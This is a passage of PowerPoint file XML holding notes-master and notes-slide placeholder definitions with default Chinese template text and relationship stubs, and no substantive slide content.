          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1245"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4023812" y="9720804"/>
            <a:ext cx="3078290" cy="513491"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1245"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{8D4E0FC9-F1F8-4FAE-9988-3BA365CFD46F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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287.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页眉占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="hdr" sz="quarter"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3078290" cy="513492"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="日期占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4023812" y="0"/>
            <a:ext cx="3078290" cy="513492"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{D2A48B96-639E-45A3-A0BA-2464DFDB1FAA}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="幻灯片图像占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481584" y="1279287"/>
            <a:ext cx="6140577" cy="3454075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:prstClr val="black"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="备注占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="710375" y="4925254"/>
            <a:ext cx="5682996" cy="4029754"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>单击此处编辑母版文本样式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>第二级</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>第三级</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>第四级</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>第五级</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="页脚占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="9720804"/>
            <a:ext cx="3078290" cy="513491"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="灯片编号占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4023812" y="9720804"/>
            <a:ext cx="3078290" cy="513491"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{A6837353-30EB-4A48-80EB-173D804AEFBD}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide10.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99.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide11.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00.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide12.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01.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide13.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02.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide14.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03.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide15.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13.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide16.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22.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide17.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23.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide18.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24.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide19.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25.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide2.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67.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide20.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49.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide21.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55.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide22.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56.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide23.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57.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide24.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58.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide25.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59.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide26.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60.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide27.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72.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide28.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78.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide29.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91.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide3.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10.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide30.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97.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide4.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25.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide5.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39.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide6.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54.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide7.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75.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide8.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81.xml"/></Relationships>
</file>

<file path=ppt/notesSlides/_rels/notesSlide9.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93.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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="幻灯片图像占位符 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="幻灯片图像占位符 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="幻灯片图像占位符 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="幻灯片图像占位符 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="幻灯片图像占位符 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="幻灯片图像占位符 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="幻灯片图像占位符 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="幻灯片图像占位符 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="幻灯片图像占位符 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="幻灯片图像占位符 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="幻灯片图像占位符 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="幻灯片图像占位符 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="幻灯片图像占位符 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="幻灯片图像占位符 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="幻灯片图像占位符 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="幻灯片图像占位符 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="幻灯片图像占位符 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="幻灯片图像占位符 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="幻灯片图像占位符 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="幻灯片图像占位符 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="幻灯片图像占位符 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="幻灯片图像占位符 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="幻灯片图像占位符 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="幻灯片图像占位符 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="幻灯片图像占位符 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="幻灯片图像占位符 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="幻灯片图像占位符 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="幻灯片图像占位符 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="幻灯片图像占位符 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="幻灯片图像占位符 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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00.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001.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002.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003.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004.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005.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006.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007.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008.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009.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10.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011.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012.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013.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014.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015.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016.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017.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018.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019.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20.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021.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1022.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1023.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1024.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1025.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1026.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1027.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1028.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1029.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30.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1031.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1032.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1033.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1034.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1035.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1036.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1037.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1038.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1039.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40.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